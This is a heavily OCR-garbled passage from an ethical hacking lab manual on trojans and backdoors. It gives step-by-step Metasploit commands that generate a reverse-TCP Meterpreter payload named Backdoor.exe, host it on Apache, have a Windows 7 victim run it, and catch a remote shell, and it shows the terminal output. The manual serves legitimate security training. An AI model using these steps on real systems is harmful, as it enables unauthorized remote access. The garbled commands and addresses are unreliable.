V!**
Htfp
II 1► >»
Applications Places system ( ]
a
I
1UC C Ct Ct 2 3 . 1 2 :0 :0 7 P M
raot^bt: — File Edit View TSfrminal Help
rootjabt: # nkdir /var/www/share rootjabt:-* ch«od -R 755 /var/ww/share/ ro otg bt: '♦ chowr chowr ■R vm data:www data:www data /var/wwv/shar< /var/wwv/shar< r o o t g b t : - ♦ I s - l a / v a r / w w / | g re re p sh sh ar ar e drw xr- xr- x 2 www-data www-data ww -dat a 4 4096 096 2012-10-23 12 A -pet :cl: -♦ service apach apache2 e2 star t | * Sta rting web server apache2 apache2 httpd (pid 3662) already running
A
back I t r ack ac k £
<<
-03. & T o r un un t he he apache web server us e the followi following ng command: cp /r oo t/.m t/. m sf4/ sf 4/d d ata/ at a/ ex ploits /* /var /v ar /w ww /sh ar e/
FIGURE 11 11.8 .8:: Starting Apache Webserver
11 11.. No w your Ap ache web server is running, running, copy the B a c k d o o r . e x e file into the share folder. folder. Type the following following comm and c p /r o o t/ D e sk to p /B a c k d o o r .e x e /v a r/ w w w /s h a re / and press Enter « « I©®©a 11 !»■ r» BackTrack BackTrack on W1N-D39MRSHL9E4 W1N-D39MRSHL9E4 - Virtual Virtual Machine Connection
File Action Media Clipboard View Help ,
A
Backdoor.exe
v
x
root'Jbt: ~
Rle Edit View Terminal Help
rootstot:-# nkdir /var/ww/share root0 b t : - 4 1 chaod -R 755 /var/ww/share/ roo tgb t:'• chow chown n r m/m m/m data:wv data:wvw w data data /var/w wvr /shar• /-.^ rootpbt:*# Is -la /w ar/mm/ | grep grep share share dr w xr -x rx 2 v/^v data ww#r data 4096 2612 JQ-21 n!n1 utm root0bt:*f service apache2 start • St ar tin g web web serve r apache2 apache2 httpd (pid 3662) already running rootflbt:-*
c p / r o o t / D e s k to to p / B a c k d o o r . e x e / v a r /w /w w w / s h a r e /
L i J i : a i i : 111:1 l . .a .a , t iu iu - u l : . I i 11: l l 11111:1. c p / ro ro o t / O e v k t Q p / B d c k d o o f . e x e / v a r /w /w w w / s h a i e /
<< back I track 1 Status: Running
FIGURE 11.9: Running Apache Webserver
12. Now go to Windows 7 Virtual Virtual Machine, Machine, op en Firetox o r any web 111 the URL field and bro ws er, and an d type the UR L http:// 1 0 . 0 . 0 . 6 /s h a r e / 111 then press Enter Here 10. 10.0.0 0.0.6 .6 is is the IP address o f BackTrack; it may vary 111 your lab environment. Note:
CEH L ab Manual Page 522 522
Ethica l Ha ckin g and Coun termea sures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
Windows 7 on W1N-D39MR5HL9E4 W1N-D39MR5HL9E4 - Virtual Virtual Ma rin e Connection
Fil•
Action
Media
Clipboard
V!**
» 0 ) ( >! Q n 1► ;fe fe0
Halp
Indtx of /than / than ’
aha'c'10.0.0.6 l£1 MottVniUd
C 9 $U 11*d 11*d i..i Su99 G«ttin G«ttin9 Su 99«a«d «a«d SiUt
*11 GopfJe
-
W«t>SUa W«t>SUa G^lcfy
= ' ■te ° * D
B » kn kn w
I
Index Inde x of/sha re Name
Last modified
Sue Description
Parent Directory
23-0ct-2012 12:12 72K A p a c h e / 2 . 2 .1 .1 4 ( U b t m r u ) S e r v e r a t 1 0 0 . 0 . 6 P o r t S O
,W^cwM'WUY...
BackTratj^^VI ^J
W indow^o^fl, o^fl,
FIGURE FIG URE 11 11.10 .10:: Firefox web browser with Backdoor.exe
If you didn't h a v e a p a c h e2 installed, run aptget install apache 2
13. Download and save the B a c k d o o r . e x e tile tile in Windo ws 7 Virtual Machine, and save tins file on the desktop. HZ 10 ®@0 II 1► ife5 Action
Media Clipboard View ew Help
C EH Certi fied
Ethical
Hacker
•Unnujl*
w FIGURE 11.11: Saved Backdoor.exe on desktop
14. Switch back to the BackTrack m achine. achine. 15. Open the Metasploit console. To create a handler to handle the connection Irom victim victim macliine (Windows (Windows 7), type the comm and u s e exploit/multi/handler and press Enter
CEH L ab Manual Page 523 523
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection
m
The exploit will will be saved saved
on / root/.msf4/data/exp root/.msf4/data/exploits/ loits/ folder
Fil• It
Action > ®
Midi•
CI!pbo» CI!pbo»rd rd
@ 0
II
V!** It
Htfp
>»
Applications Placcs system v
A
I
1UCOCt 23. 12:30 PM ,
x !terminal
Bnckdoor.e f ' 1* Ed lt V1ew Terminal Help
•
!
( .
*/
nsf > nsfpayload w1 ndows/ »eterpreter/reverse tcp LHOSW97T1m7b.91 X^tofefetop/Backdoor.exe [*] exec: exec: nsfpayload nsfpayload windows/rete rpreter/reve rsetcp LHOST LHOST-1 -192 92.. I$a-e0?9ix I$a-e0?9ix > C ^g w ^ ^j d o o r Created by nsfpayload ( h t t p : / / M M . n e t a s p l o l t . c o n ) . Payload: windows/meterpreter/reverse tcp Length: 290 Options: ("LHOST192.168 . 8 . 91 <:=*"> wsf > use use explo it/nu lti/ha nd ler | nsf exp loit (handler) >
%
<< b ack ac k I t r ack ac k ^ FIGURE 11 11.12 .12:: Exploit the victim machine
16 16.. T o use the reverse TCP, type the comm and s e t p a y l o ad ad w i n d o w s / m e t e r p r e t e r / r e v e r s e _ t c p and press Enter •
BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection
«
File Action Media Clipboard View Help < 0 10 10
®
e
e
11 i t
h
*>
Applications Places system
Backdoor.J
U=U U=U To set reverse TCP TC P vise the following command set payl payloa oad d windows/meterpreter/reverse - tcP tcP
Fl|e
Edit View
£j
[>y, 1ue OCt 23. 12:3 6 PM ,
Terminal Help
msf > tisfpayload windows/neterpreter/reverse tcp LHOST192.168.8.91 [*1 exec: nsfpayload wlndows/reterpreter/reverse tcp LH0ST=192.J68.8
I
Created by nsfpayload
!esktop/Backdoor.exe ^*jp es k top / Ba ckd0 0 r
i l
( h t t p : / /M /M M . n e t a s p l o i t. t. c o n ) .
Payload: windows/meterpreter/reverse tcp Leng th: 290 Options : { LHOST"->" 192.168 8 .91 > BSl > use use exo lolt/Bu lTl/handler
f
:f/ ^
n s f e x p l o i t ( h a n d lv lv r ) > l s e t p a y l oa oa d w i n d o w i / n e t e r p r e t e r / r e v e i s e t c p l pa y I on d -> w in do ws /m et e r pm vr 7T PV Pr CT r r p 1 fl fc fc f e x p l o i t ( h a n d l e r ) >
<< back I track 5 FIGURE 11 11.13 .13:: Setup die reverse TCP
17. To set the local IP address that will catch the reverse connection, type the command se t Ihost 10.0.0.6 (BackTrack IP IP Add ress) and press Enter
CEH L ab Manual Page 524 524
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
BackTrack 0 W1N-D39MR5HL9C4 W1N-D39MR5HL9C4 - Virtual Machine Conn ection
Fil• •it
Action
Midi*
9 ( •) •) ©
Clipboard
0
Vi**
H*lp
M l *• *•
Applications Placcs system (*J
d
I
HJC o c t 23 . 1 2 2:: 40 40 PM
1/5 r I A Avv * Tfcrroinal Bnckdoor.J
'«
Edit
View
Terminal
Help
! n i l > i s f p a y l o a d w i n d0 1 r f s / » e t e r p r e t e r / r e v e r s e _ t c p 1 H 0 S T -1 -1 9 2 ..1 1 6 8 . 8 . 9 1 X > D e s k t o p / B a c K d o o r. r. e x e I [ ♦ ] e x e c : m s f p a y l o a d w i n d o w s / n e t e r p r e t e r / r e v e r s e t c p L H Q S TT- 1199 22.. 1 6 8 . 8 . 9 1 X > D e s k t o p / B a c k do do o r ..!!
Created by rasfpayload ( h t t p : / / w w x . n e t a s p l o i t . c o n ). ). . — -
""
P a y lo lo a d : w i n d o v s / m e t e r p r e t e r/ r/ r e v e r s e _ t c p Length: 298 o p t i o n s : { " LH LH 0 5 T“ T“ = > " 1 9 2 . 1 6 8 . 8 . 9 1 * } m s f > u s e e x p l o . i t / 11 u l t i / h a n d l e r
msf ex plo it(ha ndler) > set payload wm dows/n eterpreter/re verse Tcp Tcp payload => windows/neTerpreTer/reyerse tco msf msf ex plo it(handler) > |set Ihost 1 8 . 6 . 5 . 6 | IhosT => 1 0 . 6 . 0 . 6 e x p lo it (h and ler) >_____________ >________________________ ______________________ _____________________ _______________ _____
<< b ack ac k I t r ac k 58a. FIGURE 11.14: set the lost local IP address
18. To start the handler, type the command exp loit -j -j -z and press Enter BackTrack BackTrack on W1N-D39MR5HL9L4 - Virtual Machine Connection
I I 1
File Action Media Clipboard View Help
« ) ® @•
^
j
Applications Places system [>^j
^
/4 /4 t I
■
TUe TUe OCt 23.12:44 PM
“ < <' !«
Backdoor.d File Edit View Terminal
Help
Created by nsfpayload ( h t t p : / / w w . n e t a s p l o i t . c o n ). P a y l o a d : w i n d o w s /m /m e t e r p r e t e r / r e v e r s e t c p Length: 290 O p t i o n s : { ,IHOST■ ,IHOST■‘=>•'1 ‘ =>•'1 9 2 .1 6 8 .8 .9 1 } m s f > u se se e x p l o i t / n u l t i / h a n d l e r m s f e x p l o i t ( h a n d l e r ) > s e t p a y l o a d w i n d o w s / n e te te r p r e t pa y lo ad => w in d o w s/ ri e te rp re te r/ re v e rs e tc p msf exploit(han dler) > set Ihost 18.6.8.6
Ihost -> 10.0.0.6
j
m s f e x p l o i t ( h a n d l e r ) > ! e x p l o i t - j - 1 1 I * ] E x p l o i t r u n n i n g a s b a c k g r o u nd nd j o b [-I Starte d reverse handler on 18.0.8.6:4444 I I Starting the payload handler... msf e xp loit(h andler) > I
<< back I track 5 FIGURE 11.15: 11.15: Exploit the windows 7 machine
19. Now switch to the v i c ti ti m m a c h i n e (Windows 7) and double-click the file to run it (w hich is is already downloaded) B a c k d o o r . e x e file 20. Again switch to the BackTrack machine and you can see the following figure.
CEH L ab Manual Page 525 525
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
! - ,“ *
BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection
Filt Action M#di* CI 1pbo»rd
•it S
( •) •) @ O
II
1
Vi• *
Htfp
*»
Applications Places system ^ /
x
d
a
v
File
Edit Vie w Termin al
M: TUco ct23. 3:02 pm ,
!terminal He lp
Back( Back( ♦ " * “ I 9927 27 exp loit s • 499 aux iliar y • 151 post «■ 251 ]■- - • pa yl oa ds 28 en co de rs 8 nops 1st > msfpayload window s/iieter prete r/reve rse tcp LHOST-1 LHOST-10.0 0.0.0 .0 6 X > Desktop Desktop Backdoor.exe Backdoor.exe [*] exec: nsfp ayload wind oirfs/m eterp reter/re verse tcp LHOST=10. LHOST=10.00.0.6 .0.6 X > Desktop Backdoor.exe Backdoor.exe s h : D e s k to to p : i s a d i r e c t o r y msf > msfpayload wi nd ow s/ne terp rete r/rev erse tcp LH0S LH0ST= T=18 18.0.0 .0.0 .6 X > Desktop/Backdoor.exe l J exec: nsfpayload windoirfs/meterpreter/reverse tcp LHO^I lft.ft.-O^TX 0 * e^1tt’6J»/Backdo 6J»/Backdo or.e xe Created by msfpayload u s e e x p l o i t / m u l t i /h /h a n d l e r r s f e x p l o i t ( h a n c l e r ) > s e t p a yl yl o a d w i n d o w s / n e t e r p r e t e r / r e v e r s e t c p pay loa d => w in d ow s/ m ei er p re te r/ re ve rs et cp a is is f e x p l o i t ( h a n d l e r ) > s e t I h o s t 1 0 . 0 . 8 . 6 I host => 10.0.0.6 l i l e x p l o i t ( h a n d le le r ) > e x p l o i t - J - £| £|
[*] ^l ^ l o i t 1^nnir^a 1^nnir^a^fca0 ^fca01^o r)^|joW /T
[ * ] ^ ^ r t ^ t a f e v e r s e r a n d ie ie r o f!f! 1 8 . 0. 0. 9 . 6 :4 :4 4 4 4 l 3 * S t a r t i n g t h e p r fy fy t oa oa d h s r d i e r ^ r r
^
_
_____________
Lf cl L is .
■lJiif i s l ex e x pplo l o iit(handler) t ( h a n d l e r ) >> [[ • !] Sending S e n d in in g StJBc s t ^ e (751121 ( 7 551 1 1 28 28 b y t e s ) t o 1 0 . 0 . 0 . 5 !] J I n t e r p r e t e r s e s s i o n 1 o pe pe n ed ed ( 1 0 . C 6 . 6 : 4 444 4 4 - > 1 0 . 0 . 8 .5 .5 : 4 9 4 5 8 ) a t , 1 2012-18-23 !? :57152 ♦0530 |
l&To interact with the available sessio n, you can can u s e s e s s i o n s -i -i
FIGURE 11 11.16 .16:: Exploit Exploi t result o f windows windows 7 machine
21. To interact with the available session, type the command s e s s i o n s -i -i 1 and press Enter
FIGURE 11.17: creating the session
22. Enter the command shell, and press Enter.
CEH L ab Manual Page 526 526
Etliical Ha ckin g and Cou ntenn easure s Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
Module 06 - Trojans and Backdoors
r .
BackTrack BackTrack on WIN-D39MRSHL9E4 - Virtual Machine Connection
| File Action Media Clipboard V ** \
0
( •) •) ®
o
/
a
*
11 1
A p p li c a ti o n s P i a c c s s y s t e m ^
1
Help
/ / n
x
d
IX
IUC OCt 2 3 , 3 : 1 3 PM
*!terminal
File Edit view ifefmmal Help
Backc Created by msfpayload ( http://www.netasplo 1 t . c o ■ >. Payload: windows/neterpreter/reverse tcp Length: 290 Options : CLHO CLHOST*10. ST*10. 0. 0. 6“ <■ "} nkl > use exploit/multi/handler msf msf ex plo it(handler) > set paylo payload ad window s/neterpreter/reversetcp payloa payload d *> windows/m eterpreter/reversetcp «1 sf ex plo it(handler) > set !host 16.6.8.6 I host 10.0.0.6 < B i l e x p l o i t ( h a n d le le r ) > e x p l o i t - j - 2 [*J Exploit running as background job. [*1 Started reverse handler on 10.0.6.6:4444 [*j Starting the payload handler... Il il ex plo it(handler) > [*] Sending Sending stage stage (752 (75212 128 8 bytes) bytes) to 10.0.0.5 [*] Meterpreter session 1 opened (10.6.0.6:4444 -> 10.0.0.5:49458) at 2012-10nsf ex plo it(handler) > sessions o ns *i 1 [*] S tarting interaction with 1...
c!«JS<1V1 I J Q 75© Ltj | \ Microsoft Windo indows Tv e/ sio if^n . 75©tj Copyright (c) 2009 2009 Micro soft Corpor ation.
LI Q L IV Al
righ ts reserved,
c :\users\AiHnln\pesktop>|
FIGURE 11 11.18 .18:: Type the shell command
23. Type the dir command and press press Enter It shows all the directories pres pr es ent en t on the vic tim mach ma chine ine (W (Wind indow owss 7). 1- 1° ' r ’ BackTrack BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Con nection
File Action Media Clipboard View Help
<010 ®@e ®@e 111► 1fe 5 Applications Places system /
a
v
x
cj
T er er m i n a l
.. / File Edit Edit View View Terminal Help Backc
»1 sf ex plo it(handler) > sessions sessions - i 1 [-] Invalid session id nsf ex plo it(handler) > sessions o ns i 2 [*] starting interaction with 2... interpreter > shell Process 2540 created. Channel Channel 1 crea ted. Microsoft windows [version 6.1.76011 Copyright (c) 2009 2009 Micro soft Corporation.
A ll rights reserved.
C:\Users\Adtnin\ C:\Users\Adtnin\Desktop?bi Desktop?bi f I d ir volume in drive c has no label. Volume ume Seri al Nunber Nunber is 6868-71F6 6868-71F6 Oirec tory of C:\Users\Adnin\Desktop 10/23/2012
02:56
<0IR>
|
f t p s Ljsis
.
1e/Sie1^ 1w,c1 s g f t e z 3 •w 2
a
I
Oir(s)
a
56.679,9 56.679,985.152 85.152 byteslfree
C:\Users\Adrn1 n\Desktop>§
FIGURE 11 11.19 .19:: check die directories of windows 7
Lab An alysis alysis Analyze and document die results related to die lab exercise. Give your opinion 011 your target’s security pos ture and exposure expos ure dirou dir ough gh public pu blic and a nd free information. inform ation.
CEH L ab Manual Page 527 527
Ethica l Ha ckin g and Coun termeas ures Copyright Copyright © by EC-Counci EC-Councill All Rights Reserved. Reproduction is Stricdy Prohibited.
P L E A S E T AL AL K T O Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B. B.
T o o l/ l/ U t il il i t y M e ta s p l o i t
I n fo fo rm rm a ti ti o n C o l le le ct ct e d/ d / O b je je ct c t i v es e s A c hi hi e v ed ed O u tp u t : Hack the W indows 7 machine directories directories
Internet Conn ection ection R equired □ Y es
0 No
Platform Supported 0 C la l a ss ss rro o om om
CE H Lab M anual Page 528 528
0 iLabs Labs
Ethica l Ha ckin g and Cou ntenn easures Copyrigh Copyrightt © by EC-Council EC-Council A l Rights Reserved. Reproduction is Strictly Strictly Prohibited.